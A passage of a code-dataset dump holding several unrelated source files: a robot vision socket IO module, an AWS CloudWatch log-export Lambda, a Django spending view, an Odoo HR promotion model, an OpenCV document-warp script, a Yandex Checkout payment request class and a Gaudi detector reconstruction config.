= sendEnvRequest_network(action)\n else:\n env_str = None\n \n return env_str\n\n\ndef sendEnvRequest_network(action = None):\n \"\"\"Requests and assembles the environment string through information\n received from the server.\n \"\"\"\n \n global vision_sock\n global environment\n \n global vision_ip\n global vision_port\n \n global blocks\n \n 
init_connect(\"vision\", vision_ip, vision_port)\n \n vision_sock.send(bytes('0001'+'\\0', 'UTF-8'))\n \n data = vision_sock.recv(buffer_size) \n obj_array = []\n if data is not None:\n try:\n for i in range(20):\n obj = []\n for j in range(10):\n loc = i*10 + j\n obj.extend(struct.unpack('f',data[4*loc:4*(loc + 1)]))\n obj_array.append(obj)\n except:\n logger.error(\"Error in unpacking data\")\n else:\n logger.error(\"No data received in response to request\")\n \n vision_sock.close()\n\n for color in colors_b.keys():\n colors_b[color] = [] \n \n for color in colors_box.keys():\n colors_box[color] = []\n \n blocks = []\n for obj in obj_array:\n if int(obj[0]) == 0: break \n blocks.append(sceneObject(obj, action))\n \n env_str = \"\" \n for block in blocks:\n env_str += block.return_string() + '+'\n\n # assume gripper is closed \n gripperCloseSignal = 0\n\n environment = env_str[:-1]\n \n return str(gripperCloseSignal) + '#' + env_str[:-1]\n\n\ndef sendActions(actions, env = '', vision_ip = None, vision_port = None,\n rec_ip = None, rec_port = None):\n \"\"\"Sends the action sequence to the server through the connection and closes\n the socket connections.\n \"\"\"\n \n global rec_sock\n global rec_enabled\n global vision_sock\n global vision_enabled\n global timesAccessed2\n \n \n if vision_enabled:\n if vision_ip is None or vision_port is None:\n logger.info(\"Vision IP or port not specified, actions not sent\")\n return\n try:\n init_connect(\"vision\", vision_ip, vision_port)\n except socket.error:\n logger.error(\"Connection to vision capture refused, actions not sent\")\n return\n \n if rec_enabled:\n if rec_ip is None or rec_port is None:\n logger.info(\"Recipient IP or port not specified, actions not sent\")\n return\n try:\n init_connect(\"rec\", rec_ip, rec_port)\n except socket.error:\n logger.error(\"Connection to recipient refused, actions not sent\")\n return\n\n visioninfo = ''\n if type(actions) != tuple:\n for action in actions.values():\n visioninfo += str(action)\n visioninfo += '+' + environment\n\n recinfo = visioninfo\n \n if recinfo != '':\n logger.info('generated action string: '+visioninfo)\n logger.info('sending command string: '+recinfo)\n if vision_enabled:\n vision_sock.send(bytes(visioninfo+'\\0', 'UTF-8'))\n if rec_enabled:\n rec_sock.send(bytes(recinfo+'\\0', 'UTF-8'))\n else:\n logger.info('No actions to send')\n \n if vision_enabled:\n vision_sock.close()\n if rec_enabled:\n rec_sock.close()\n \ndef find_object(objs, width, height, depth):\n \"\"\"Given an object array, returns the scene object which most closely fits \n the desired parameters.\n \n @param objs - array of scene objects to be searched\n @param width - width of desired object\n @param height - height of desired object\n @param depth - depth of desired object\n \"\"\"\n \n lowest_error = sys.maxsize\n lowest_error_obj = None\n for obj in objs:\n error = sqrt((width - obj.width)**2 + (height - obj.height)**2 + \\\n (depth - obj.depth)**2)\n if error < lowest_error:\n lowest_error = error\n lowest_error_obj = obj\n return lowest_error_obj\n \n\ndef match_object(obj):\n lowest_error = sys.maxsize\n lowest_error_obj = None\n width_a, height_a, depth_a = obj.width, obj.height, obj.depth\n for item in object_sizes.keys():\n width_b, height_b, depth_b = object_sizes[item]\n error = sqrt((width_a - width_b)**2 + (height_a - height_b)**2 + \\\n (depth_a - depth_b)**2)\n if error < lowest_error:\n lowest_error = error\n lowest_error_obj = item\n return lowest_error_obj\n\ndef trajectory(obj1, 
obj2=None):\n \"\"\"Given two sceneObjects, returns the trajectory between them OR\n given a solution list, returns the total trajectory of the solution.\n If there is a typing error, returns 0 and a logging error is raised.\n \n @param obj1 - a sceneObject or a solution list\n @param obj2 - a sceneObject, only necessary if obj1 is not a list\n \"\"\"\n global blocks\n \n blocks_t = copy.deepcopy(blocks)\n\n blocks_t.append(sceneObject([43.0,0.0,1000.0,0.0,70.0,0.0,0.0,0.0,0.0,0.0]))\n blocks_t.append(sceneObject([28.0,0.0,1000.0,0.0,70.0,0.0,0.0,0.0,0.0,0.0]))\n blocks_t.append(sceneObject([75.0,0.0,700.0,0.0,100.0,0.0,0.0,0.0,0.0,0.0]))\n blocks_t[-3].name = \"tip\"\n blocks_t[-2].name = \"air\"\n blocks_t[-1].name = \"table\"\n \n if isinstance(obj1,sceneObject) and isinstance(obj2,sceneObject):\n return abs(obj1.x-obj2.x)+abs(obj1.y-obj2.y)+abs(obj1.z-obj2.z)\n elif isinstance(obj1,list):\n total = 0\n for action in obj1:\n act = action.name[1:-1].split(' ')\n if act[0] in ['open_gripper','close_gripper']:\n pass\n elif len(act) == 4:\n for block in blocks_t:\n if act[1] == block.name:\n s_obj1 = block\n if act[3] == block.name:\n s_obj2 = block\n total += trajectory(s_obj1,s_obj2)\n elif len(act) == 3:\n for block in blocks_t:\n if act[1] == block.name:\n s_obj1 = block\n if act[2] == block.name:\n s_obj2 = block\n total += trajectory(s_obj1,s_obj2)\n else:\n pass #not implemented yet\n return total\n else:\n logger.error(\"First argument should be either a list or a sceneObject.\")\n return 0\n\nclass sceneObject(object):\n \"\"\"Class for representing objects in environment.\"\"\"\n \n def __init__(self, obj_array, action = None):\n self.handle = int(obj_array[0]) # index\n self.color = _colors[int(obj_array[1])]\n if self.color == 'grey':\n self.color = 'white'\n self.volume = obj_array[2]\n self.x = int(obj_array[3])\n self.y = int(obj_array[4])\n self.z = int(obj_array[5]) # - 20 \n self.r = _rgb[_colors[int(obj_array[1])]][0]\n self.g = _rgb[_colors[int(obj_array[1])]][1]\n self.b = _rgb[_colors[int(obj_array[1])]][2]\n if vision_enabled:\n self.height = obj_array[6] * 1050 - obj_array[8] * 200 # conversion to millimeters\n self.width = obj_array[7] * 800\n self.depth = obj_array[8] * 850\n else:\n self.height = obj_array[6]\n self.width = obj_array[7]\n self.depth = obj_array[8]\n \n found_type = match_object(self)\n if 'block' in found_type:\n self.type = 'block'\n if found_type == 'block1':\n self.shape = 'cubic'\n else:\n self.shape = 'cuboid'\n if self.handle not in colors_b[self.color]:\n colors_b[self.color].append(self.handle)\n self.name = self.color+str(len(colors_b[self.color]))\n elif found_type == 'bottle':\n self.type = 'block'\n self.shape = 'bottle'\n if self.handle not in colors_b[self.color]:\n colors_b[self.color].append(self.handle)\n self.name = self.color+str(len(colors_b[self.color]))\n else:\n self.type = 'oth'\n if found_type == 'box':\n self.shape = 'box'\n elif 'cyl' in found_type:\n self.shape = 'cylinder' # need to change type, 'oth' implies box right now\n else:\n self.shape = 'dummy'\n if self.handle not in colors_box[self.color]:\n colors_box[self.color].append(self.handle)\n self.name = self.color + \"box\" + str(len(colors_box[self.color]))\n if self.shape == 'cylinder':\n self.name = self.name.replace('box','cyl')\n self.z += 100\n\n #other shapes and types not yet implemented\n\n def __str__(self):\n s = indent(\n \"\\nHandle: \" + str(self.handle) + \\\n \"\\nName: \" + str(self.name) + \\\n \"\\nx: \" + str(self.x) + \\\n \"\\ny: \" + 
str(self.y) + \\\n \"\\nz: \" + str(self.z) + \\\n \"\\nr: \" + str(self.r) + \\\n \"\\ng: \" + str(self.g) + \\\n \"\\nb: \" + str(self.b))\n return s\n \n def return_string(self):\n \"\"\"Returns a string representing the instance of sceneObject.\n This representation is appropriate for constructing the environment\n string, and as such differs from the __str__ representation.\n \"\"\"\n \n return str(self.handle)+'+'+str(self.name)+'+'+\\\n str(self.x)+'+'+str(self.y)+'+'+str(self.z)+'+'+\\\n str(self.r)+'+'+str(self.g)+'+'+str(self.b)+'+'+\\\n self.type+'+'+self.shape\n","sub_path":"IO.py","file_name":"IO.py","file_ext":"py","file_size_in_byte":13306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
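The size-matching helpers at the end of IO.py (find_object, match_object) both reduce to a nearest-neighbour search in (width, height, depth) space. A minimal standalone sketch of that idea, assuming only the object_sizes table copied (and trimmed) from the module; match_size is a hypothetical name, not part of the file:

from math import sqrt

# Trimmed copy of the module's size catalogue (millimetres).
object_sizes = {"block1": [30, 30, 30], "block2": [30, 60, 30],
                "box": [135, 120, 135], "bottle": [60, 200, 60]}

def match_size(width, height, depth):
    # Return the catalogue entry with the smallest Euclidean distance,
    # mirroring match_object's lowest_error loop.
    best, best_err = None, float("inf")
    for name, (w, h, d) in object_sizes.items():
        err = sqrt((width - w) ** 2 + (height - h) ** 2 + (depth - d) ** 2)
        if err < best_err:
            best, best_err = name, err
    return best

print(match_size(32, 58, 29))  # -> block2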
+{"seq_id":"69940028","text":"import boto3\nimport os\nimport time\nfrom datetime import timedelta\nfrom datetime import datetime\n\nlogs = boto3.client('logs')\ngmt_format = '%Y-%m-%dT%H:%M:%S.%fZ'\ndry_run_enabled = os.environ.get('DRY_RUN').lower() in ('true', 'yes', '1')\nexport_bucket = os.environ.get('EXPORT_BUCKET')\n\ndef get_log_groups():\n log_groups = []\n response = logs.describe_log_groups()\n log_groups += response['logGroups']\n while 'nextToken' in response:\n response = logs.describe_log_groups(nextToken=response['nextToken'])\n log_groups += response['logGroups']\n return log_groups\n\ndef export_log_group(log_group, from_time, to_time, label, bucket):\n log_group_name = log_group['logGroupName']\n print( \"Creating export task for \" + log_group_name)\n slash_replace_string=\"__\"\n name_s3_prefix=f\"{os.environ.get('ACCOUNT_ID')}/{log_group_name.replace('/', slash_replace_string)}/{label}\"\n log_streams = logs.describe_log_streams(limit=1, logGroupName=log_group_name, orderBy=\"LastEventTime\", descending=True)['logStreams']\n if len(log_streams) == 0 or 'lastEventTimestamp' not in log_streams[0]:\n print(f\"e_l_g- no streams with messages for logGroup {log_group_name}; Nothing to do\")\n elif int(log_streams[0]['lastEventTimestamp']) < from_time:\n print(f\"e_l_g- no streams with messages since the beginning of yesterday. [{int(log_streams[0]['lastEventTimestamp'])} < {from_time}]; Nothing to do.\")\n else:\n print(f\"e_l_g- Stream exists with message since the beginning of yesterday. [{int(log_streams[0]['lastEventTimestamp'])} > {from_time}]; Let's go!\")\n # Create the export task\n if dry_run_enabled:\n print(\"e_l_g- Dry Run Enabled, skipping create task\")\n else:\n response = {\"taskId\": \"WARNING: NEVER STARTED\"}\n try:\n print(f\"e_l_g- Running logGroupName={log_group_name} taskName={log_group_name}-{label} destination={bucket} destinationPrefix={name_s3_prefix}\")\n response = logs.create_export_task( logGroupName=log_group_name, taskName=f\"{log_group_name}-{label}\", fromTime=from_time, to=to_time, destination=bucket, destinationPrefix=name_s3_prefix)\n except logs.exceptions.LimitExceededException:\n print( \"AWS wouldn't let us create a new export task, even though they said there's no task running. 
Waiting one more time and retrying...\" )\n wait_for_completion(5)\n response = logs.create_export_task( logGroupName=log_group_name, taskName=f\"{log_group_name}-{label}\", fromTime=from_time, to=to_time, destination=bucket, destinationPrefix=name_s3_prefix)\n print( f\"export_log_group - Got a taskId {response['taskId']}\" )\ndef wait_for_completion(presleep=0):\n time.sleep(presleep)\n while (len(logs.describe_export_tasks(statusCode=\"PENDING\")['exportTasks']) + len(logs.describe_export_tasks(statusCode=\"RUNNING\")['exportTasks']) ) > 0:\n print(\"wait_for_completion - Waiting for previous export task to finish...\")\n time.sleep(1)\n print(\"wait_for_completion - No RUNNING or PENDING export tasks\")\ndef lambda_handler(event, context):\n if dry_run_enabled:\n print('~' * 60)\n print(\"DryRun: Enabled\")\n print(\"When dry run mode is enabled the SDK request are validated but no actions are transmitted\")\n print('~' * 60)\n # Get start/end time for logs\n now=datetime.now()\n today=datetime(year=now.year, month=now.month, day=now.day)\n yesterday=today - timedelta(days=1)\n epoch=datetime(year=1970,month=1,day=1)\n epoch_yesterday=yesterday-epoch\n epoch_today=today-epoch\n from_time=int(epoch_yesterday.total_seconds()*1000)\n to_time=int(epoch_today.total_seconds()*1000 - 1)\n label=f'{yesterday.year}-{yesterday.month}-{yesterday.day}'\n log_groups = get_log_groups()\n for log_group in log_groups:\n wait_for_completion()\n export_log_group(from_time=from_time, to_time=to_time, label=label, bucket=export_bucket, log_group=log_group)\n","sub_path":"terraform/account/lambdas/sba-security-logexport/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
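The from_time/to_time arithmetic in lambda_handler selects exactly yesterday in epoch milliseconds: from midnight up to one millisecond before today's midnight. A minimal sketch of just that computation, runnable on its own:

from datetime import datetime, timedelta

now = datetime.now()
today = datetime(year=now.year, month=now.month, day=now.day)
yesterday = today - timedelta(days=1)
epoch = datetime(year=1970, month=1, day=1)

from_time = int((yesterday - epoch).total_seconds() * 1000)  # first ms of yesterday
to_time = int((today - epoch).total_seconds() * 1000 - 1)    # last ms of yesterday
label = f"{yesterday.year}-{yesterday.month}-{yesterday.day}"
print(from_time, to_time, label)

Note the window comes from the function's local clock (UTC on AWS Lambda), so "yesterday" means yesterday in UTC.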
+{"seq_id":"285951700","text":"from rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom usaspending_api.spending_explorer.v2.filters.type_filter import type_filter\n\n\nclass SpendingExplorerViewSet(APIView):\n\n def post(self, request):\n\n json_request = request.data\n _type = json_request.get('type')\n filters = json_request.get('filters', None)\n\n # Returned filtered queryset results\n results = type_filter(_type, filters)\n\n return Response(results)\n","sub_path":"usaspending_api/spending_explorer/v2/views/spending_explorer.py","file_name":"spending_explorer.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
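Exercising this endpoint only requires a JSON body with a "type" key and an optional "filters" object, the two keys the post handler reads. A minimal client sketch; the URL path and filter values are assumptions for illustration, only the body shape comes from the view:

import requests

payload = {
    "type": "agency",            # passed to type_filter as _type
    "filters": {"fy": "2017"},   # optional; the view defaults it to None
}
resp = requests.post("http://localhost:8000/api/v2/spending/", json=payload)
print(resp.json())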
+{"seq_id":"612729982","text":"# -*- coding: utf-8 -*-\nfrom odoo import models, fields, _, api\nfrom odoo.exceptions import Warning\n\n\n# Ahmed Salama Code Start ---->\n\n\nclass HrPromotion(models.Model):\n\t_name = 'hr.promotion'\n\t_description = \"HR Employee Transfer\"\n\t_inherit = ['mail.thread', 'image.mixin']\n\t\n\tdate = fields.Date(\"Date\", default=fields.Date.today(),\n\t\t\t\t\t readonly=True, states={'draft': [('readonly', False)]})\n\tname = fields.Char(\"Decision No.\",\n\t\t\t\t\t readonly=True, states={'draft': [('readonly', False)]})\n\tstate = fields.Selection([('draft', 'Draft'), ('confirm', 'Confirmed'), ('done', 'Done')\n\t\t , ('cancel', 'Cancelled')], default='draft', string=\"Stage\",\n\t track_visibility='onchange')\n\tline_ids = fields.One2many('hr.promotion.line', 'action_id', \"Lines\",\n\t\t\t\t\t\t\t track_visibility='onchange', readonly=True, states={'draft': [('readonly', False)]})\n\t\n\tdef action_confirm(self):\n\t\tmessages = ''\n\t\tfor line in self.line_ids:\n\t\t\tif line.new_level_id and line.level_id != line.new_level_id:\n\t\t\t\tmessages += \"- Employee [%s] Level [%s] updated to [%s] \" % \\\n\t\t\t\t (line.employee_id.name, line.level_id.name, line.new_level_id.name)\n\t\t\t\tline.old_level_id = line.level_id and line.level_id.id or False\n\t\t\t\tline.employee_id.write({'level_id': line.new_level_id.id, 'level_date': self.date})\n\t\tif len(messages):\n\t\t\tself.message_post(body=messages)\n\t\tself.write({'state': 'confirm'})\n\n\t\n\tdef action_cancel(self):\n\t\tself.write({'state': 'cancel'})\n\t\n\tdef action_reset(self):\n\t\tself.write({'state': 'draft'})\n\t\n\tdef action_print_report(self):\n\t\treturn self.env.ref('egymentors_hr.hr_employee_promotion_report').report_action(self)\n\t\t\n\tdef unlink(self):\n\t\tfor rec in self:\n\t\t\tif rec.state == 'confirm':\n\t\t\t\traise Warning(_(\"You can't delete confirmed records!!!\"))\n\t\treturn super(HrPromotion, self).unlink()\n\n\nclass HrEmployeeActionLine(models.Model):\n\t_name = 'hr.promotion.line'\n\t_rec_name = 'action_id'\n\t\n\taction_id = fields.Many2one('hr.promotion', \"Action\")\n\tstate = fields.Selection(related='action_id.state')\n\temployee_id = fields.Many2one('hr.employee', \"Employee\", required=True)\n\t\n\t@api.onchange('employee_id')\n\t@api.depends('employee_id.level_date')\n\tdef _get_level_date(self):\n\t\tfor line in self:\n\t\t\tif line.employee_id:\n\t\t\t\tline.level_date = line.employee_id.level_date\n\t\t\t\t\n\t@api.model\n\tdef create(self, vals):\n\t\tif vals.get('employee_id'):\n\t\t\temp_id = self.env['hr.employee'].browse(vals.get('employee_id'))\n\t\t\tif emp_id and emp_id.level_date:\n\t\t\t\tvals['level_date'] = emp_id.level_date\n\t\treturn super(HrEmployeeActionLine, self).create(vals)\n\t\n\tdef write(self, vals):\n\t\tif vals.get('employee_id'):\n\t\t\temp_id = self.env['hr.employee'].browse(vals.get('employee_id'))\n\t\t\tif emp_id and emp_id.level_date:\n\t\t\t\tvals['level_date'] = emp_id.level_date\n\t\treturn super(HrEmployeeActionLine, self).write(vals)\n\t\t\n\tlevel_date = fields.Date(\"Current Level Date\")\n\tlevel_id = fields.Many2one(related='employee_id.level_id', string=\"Current Level\", track_visibility='onchange')\n\told_level_id = fields.Many2one('hr.level', \"Old Level\")\n\tnew_level_id = fields.Many2one('hr.level', \"New Level\")\n\n\n# Ahmed Salama Code 
End.\n","sub_path":"egymentors_hr/models/hr_promotion.py","file_name":"hr_promotion.py","file_ext":"py","file_size_in_byte":3171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"513009903","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nimport cv2 as cv\nimport sys\n\ndef get_corners(image):\n raw_image = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n\n # Numpy show rows, cols but, annoyingly, findContours\n # and OpenCV in general uses cols, rows. That's the \n # reason for the next two lines.\n rows, cols = raw_image.shape\n canvas_corners = [(0, 0), (cols, 0), (0, rows), (cols, rows)]\n corners = []\n\n blur_v = int(rows / 720) * 33\n blur_v = blur_v if blur_v % 2 else blur_v + 1\n md_blur = cv.medianBlur(raw_image, blur_v)\n\n show(md_blur)\n\n thresh = cv.adaptiveThreshold(md_blur, 255, cv.ADAPTIVE_THRESH_MEAN_C, cv.THRESH_BINARY_INV, 11, 2)\n\n show(thresh)\n\n _, contours, _ = cv.findContours(thresh, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)\n\n if contours:\n CAM_SIZE = (cols, rows)\n\n center = (CAM_SIZE[0]/2, CAM_SIZE[1]/2)\n limit = (95, 95)\n\n lims = [(center[0] - limit[0]*CAM_SIZE[0]/100/2, limit[0]*CAM_SIZE[0]/100/2 + center[0]), \\\n (center[1] - limit[1]*CAM_SIZE[1]/100/2, limit[1]*CAM_SIZE[1]/100/2 + center[1])]\n\n rect_contours = []\n for cnt in contours:\n avg = np.average(cnt, axis=0)[0]\n if (lims[0][0] < avg[0] < lims[0][1]) and (lims[1][0] < avg[1] < lims[1][1]):\n rect_contours.append(cnt)\n \n #rect = max(contours, key=lambda x: len(x))\n rect = np.concatenate(rect_contours)\n\n for i in range(4):\n np_corner = min(rect, key=lambda x: \\\n np.sqrt((canvas_corners[i][0]-x[0][0])**2 +\\\n (canvas_corners[i][1]-x[0][1])**2))[0]\n corner = (np_corner[0], np_corner[1])\n corners.append(corner)\n\n return corners\n\ndef draw_corners(image, corners):\n copy = np.copy(image)\n\n factor = int(copy.shape[0] / 720)\n radius = factor * 10\n thick = factor * 4\n\n for corner in corners:\n cv.circle(copy, corner, radius, (0, 0, 255), thick)\n \n return copy\n\ndef main(arg):\n rawim = cv.imread(arg)\n corners = get_corners(rawim)\n img = draw_corners(rawim, corners)\n show(img)\n\n img = warp_image(rawim, corners, (640, 480))\n img = equalize_image(img)\n\n #cv.imwrite('res.jpg', img)\n\n show(img)\n\ndef warp_image(raw_image, corners, canvas):\n image = cv.cvtColor(raw_image, cv.COLOR_BGR2GRAY)\n\n _, t_r, b_l, b_r = corners\n cols = t_r[0] if t_r[0] > b_r[0] else b_r[0]\n rows = b_l[1] if b_l[1] > b_r[1] else b_r[1]\n canvas = [(0, 0), (cols, 0), (0, rows), (cols, rows)]\n\n warper = cv.getPerspectiveTransform(np.float32(corners), np.float32(canvas))\n warped = cv.warpPerspective(image, warper, canvas[3])\n\n image = cv.cvtColor(warped, cv.COLOR_GRAY2BGR)\n\n return image\n\ndef equalize_image(raw_image):\n image = cv.cvtColor(raw_image, cv.COLOR_BGR2GRAY)\n\n tile_size = int(raw_image.shape[0] * 0.1)\n clahe = cv.createCLAHE(clipLimit=10, tileGridSize=(tile_size,tile_size))\n equalized = clahe.apply(image)\n\n contrast = cv.multiply(equalized, 1.25)\n\n blur = cv.medianBlur(contrast, 3)\n _, thresh = cv.threshold(blur, 150, 255, cv.THRESH_TOZERO)\n\n image = cv.cvtColor(thresh, cv.COLOR_GRAY2BGR)\n\n return image\n\ndef odd(num):\n return num if num % 2 else num + 1\n\n\n\ndef show(image):\n im = cv.resize(image,(800, 480),fx=0, fy=0, interpolation=cv.INTER_AREA)\n cv.imshow('image', im)\n\n while True:\n key = cv.waitKey(1) & 0xFF\n if key == ord('q'):\n return\n\nif __name__ == '__main__': main(sys.argv[1])\n","sub_path":"rough/snaps.py","file_name":"snaps.py","file_ext":"py","file_size_in_byte":3638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
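warp_image above depends on get_corners returning points in the same order as the destination canvas (top-left, top-right, bottom-left, bottom-right); getPerspectiveTransform pairs the two lists index by index. A minimal standalone sketch of that mapping with invented corner coordinates:

import numpy as np
import cv2 as cv

src = np.float32([(12, 9), (630, 14), (8, 470), (637, 475)])  # detected corners
dst = np.float32([(0, 0), (640, 0), (0, 480), (640, 480)])    # canvas corners
M = cv.getPerspectiveTransform(src, dst)

image = np.zeros((480, 640, 3), dtype=np.uint8)    # stand-in for a real photo
warped = cv.warpPerspective(image, M, (640, 480))  # dsize is (cols, rows)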
+{"seq_id":"470417779","text":"from yandex_checkout.domain.common.request_object import RequestObject\nfrom yandex_checkout.domain.models.airline import Airline\nfrom yandex_checkout.domain.models.amount import Amount\nfrom yandex_checkout.domain.models.confirmation.confirmation import Confirmation\nfrom yandex_checkout.domain.models.confirmation.confirmation_factory import ConfirmationFactory\nfrom yandex_checkout.domain.models.payment_data.payment_data import PaymentData\nfrom yandex_checkout.domain.models.payment_data.payment_data_factory import PaymentDataFactory\nfrom yandex_checkout.domain.models.receipt import Receipt\nfrom yandex_checkout.domain.models.recipient import Recipient\n\n\nclass PaymentRequest(RequestObject):\n __recipient = None\n\n __amount = None\n\n __description = None\n\n __receipt = None\n\n __payment_token = None\n\n __payment_method_id = None\n\n __payment_method_data = None\n\n __confirmation = None\n\n __save_payment_method = None\n\n __capture = None\n\n __client_ip = None\n\n __airline = None\n\n __metadata = None\n\n @property\n def recipient(self):\n return self.__recipient\n\n @recipient.setter\n def recipient(self, value):\n if isinstance(value, dict):\n self.__recipient = Recipient(value)\n elif isinstance(value, Recipient):\n self.__recipient = value\n else:\n raise TypeError('Invalid recipient value type')\n\n @property\n def amount(self):\n return self.__amount\n\n @amount.setter\n def amount(self, value):\n if isinstance(value, dict):\n self.__amount = Amount(value)\n elif isinstance(value, Amount):\n self.__amount = value\n else:\n raise TypeError('Invalid amount value type')\n\n @property\n def description(self):\n return self.__description\n\n @description.setter\n def description(self, value):\n cast_value = str(value)\n if cast_value and len(cast_value) <= 128:\n self.__description = cast_value\n else:\n raise ValueError('Invalid description value')\n\n @property\n def receipt(self):\n return self.__receipt\n\n @receipt.setter\n def receipt(self, value):\n if isinstance(value, dict):\n self.__receipt = Receipt(value)\n elif isinstance(value, Receipt):\n self.__receipt = value\n else:\n raise TypeError('Invalid receipt value type')\n\n @property\n def payment_token(self):\n return self.__payment_token\n\n @payment_token.setter\n def payment_token(self, value):\n cast_value = str(value)\n if cast_value:\n self.__payment_token = cast_value\n else:\n raise ValueError('Invalid payment_token value')\n\n @property\n def payment_method_id(self):\n return self.__payment_method_id\n\n @payment_method_id.setter\n def payment_method_id(self, value):\n cast_value = str(value)\n if cast_value:\n self.__payment_method_id = cast_value\n\n @property\n def payment_method_data(self):\n return self.__payment_method_data\n\n @payment_method_data.setter\n def payment_method_data(self, value):\n if isinstance(value, dict):\n self.__payment_method_data = PaymentDataFactory().create(value, self.context())\n elif isinstance(value, PaymentData):\n self.__payment_method_data = value\n else:\n raise TypeError('Invalid payment_method_data type')\n\n @property\n def confirmation(self):\n return self.__confirmation\n\n @confirmation.setter\n def confirmation(self, value):\n if isinstance(value, dict):\n self.__confirmation = ConfirmationFactory().create(value, self.context())\n elif isinstance(value, Confirmation):\n self.__confirmation = value\n else:\n raise TypeError('Invalid confirmation type')\n\n @property\n def save_payment_method(self):\n return 
self.__save_payment_method\n\n @save_payment_method.setter\n def save_payment_method(self, value):\n self.__save_payment_method = bool(value)\n\n @property\n def capture(self):\n return self.__capture\n\n @capture.setter\n def capture(self, value):\n self.__capture = bool(value)\n\n @property\n def client_ip(self):\n return self.__client_ip\n\n @client_ip.setter\n def client_ip(self, value):\n self.__client_ip = str(value)\n\n @property\n def airline(self):\n return self.__airline\n\n @airline.setter\n def airline(self, value):\n if isinstance(value, dict):\n self.__airline = Airline(value)\n elif isinstance(value, Airline):\n self.__airline = value\n else:\n raise TypeError('Invalid airline type')\n\n @property\n def metadata(self):\n return self.__metadata\n\n @metadata.setter\n def metadata(self, value):\n if type(value) is dict:\n self.__metadata = value\n\n def validate(self):\n amount = self.amount\n if amount is None:\n self.__set_validation_error('Payment amount not specified')\n\n if amount.value <= 0.0:\n self.__set_validation_error('Invalid payment amount value: ' + str(amount.value))\n\n if self.receipt is not None and self.receipt.has_items:\n email = self.receipt.email\n phone = self.receipt.phone\n if not email and not phone:\n self.__set_validation_error('Both email and phone values are empty in receipt')\n\n if self.receipt.tax_system_code is None:\n for item in self.receipt.items:\n if item.vat_code is None:\n self.__set_validation_error('Item vat_code and receipt tax_system_id not specified')\n\n if self.payment_token:\n if self.payment_method_id:\n self.__set_validation_error('Both payment_token and payment_method_id values are specified')\n\n if self.payment_method_data:\n self.__set_validation_error('Both payment_token and payment_data values are specified')\n\n elif self.payment_method_id:\n if self.payment_method_data:\n self.__set_validation_error('Both payment_method_id and payment_data values are specified')\n\n def __set_validation_error(self, message):\n raise ValueError(message)\n","sub_path":"yandex_checkout/domain/request/payment_request.py","file_name":"payment_request.py","file_ext":"py","file_size_in_byte":6362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
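Because every setter accepts either a plain dict or the matching domain object, a request can be assembled from literals and then checked with validate(). A minimal sketch with invented field values; the dict shapes follow the setters above:

from yandex_checkout.domain.request.payment_request import PaymentRequest

request = PaymentRequest()
request.amount = {"value": 100.0, "currency": "RUB"}  # coerced to Amount
request.description = "Order #37"                     # must be <= 128 chars
request.capture = True
request.metadata = {"order_id": "37"}
request.validate()  # raises ValueError if, e.g., the amount is missing or <= 0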
+{"seq_id":"209794246","text":"from Gaudi.Configuration import *\n\n###### Parser ################\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('--input', type=str, default=None, help='specify an input File')\nmy_args, _ = parser.parse_known_args()\n\nfrom FWCore.joboptions import parse_standard_job_options\nargs = parse_standard_job_options()\n\n\"\"\"\nmy_input = \"simu_test.root\"\noutfilename = \"reco_test.root\"\n\"\"\"\n\nif args.outputfile is not None:\n outfilename = args.outputfile\n\nif my_args.input != None:\n my_input = my_args.input\n\n################################\n\n#my_input = \"simu_test.root\"\n#outfilename = \"reco_100eV_DCA8mm.root\"\n\"\"\"\nmy_input =\"/eos/user/n/nali/Hadrons/HadZ.root\"\noutfilename = \"/eos/user/n/nali/Hadrons/Analysis_HadZ.root\"\n\n\nmy_input =\"/eos/user/n/nali/SR/SR.root\"\noutfilename = \"/eos/user/n/nali/SR/Analysis_SR.root\"\n\"\"\"\n\"\"\"\nmy_input = \"fccee_fullsim_pgun_2T_1MeV.root\"\noutfilename = \"mergedHits_2T_1MeV.root\"\n\"\"\"\n\n\"\"\"\nset_energy = 2400\nmy_input = \"SimuOutput/pgun/\"+str(set_energy)+\"MeV_theta90.root\"\noutfilename = \"SimuOutput/pgun/reco_\"+str(set_energy)+\"MeV_theta90.root\"\n\"\"\"\n\nmy_input = \"SimuOutput/pythia/simu_Zdd.root\"\noutfilename = \"SimuOutput/pythia/reco_simu_Zdd.root\"\n\nfrom GaudiKernel.SystemOfUnits import eV\nfrom Configurables import ApplicationMgr, FCCDataSvc, PodioOutput\n\npodioevent = FCCDataSvc(\"EventDataSvc\", input=my_input)\n\n\n\nfrom Configurables import PodioInput, ReadTestConsumer\npodioinput = PodioInput(\"PodioReader\", collections=[\"positionedHits_DCH\"], OutputLevel=DEBUG)\n#checker = ReadTestConsumer()\n\n\n# DD4hep geometry service\n# Parses the given xml file\nfrom Configurables import GeoSvc\ngeoservice = GeoSvc(\"GeoSvc\", detectors=['Detector/DetFCCeeIDEA/compact/FCCee_DectEmptyMaster.xml',\n 'Detector/DetFCCeeIDEA/compact/DriftChamber.xml'], \n OutputLevel = DEBUG)\n\nfrom Configurables import CreateDCHHits\ncreatehits = CreateDCHHits(\"CreateDCHHits\",\n readoutName = \"DriftChamberCollection\",\n outFileName=outfilename,\n EdepCut = 100*1e-9,\n DCACut = 0.8,\n OutputLevel=DEBUG)\n\ncreatehits.positionedHits.Path = \"positionedHits_DCH\"\ncreatehits.mergedHits.Path = \"merged_DCH\"\n\n\nApplicationMgr( TopAlg = [podioinput, \n createhits, \n ],\n EvtSel = 'NONE',\n EvtMax = -1,\n # order is important, as GeoSvc is needed by SimG4Svc\n ExtSvc = [podioevent, \n geoservice\n ],\n OutputLevel = DEBUG\n 